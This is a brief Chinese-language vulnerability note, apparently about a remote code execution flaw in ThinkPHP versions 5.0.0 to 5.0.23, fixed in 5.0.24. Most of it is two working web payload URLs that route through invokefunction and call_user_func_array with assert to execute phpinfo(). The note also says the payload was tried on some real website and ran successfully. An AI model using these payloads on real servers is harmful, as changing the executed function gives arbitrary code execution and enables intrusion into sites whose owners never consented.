漏洞影響范圍: 5.0.0-5.0.23
官方已在5.0.24版本修復該漏洞。
測試Payload:
/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo() /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
以某個網站為例,可以看到成功執行phpinfo()函數。
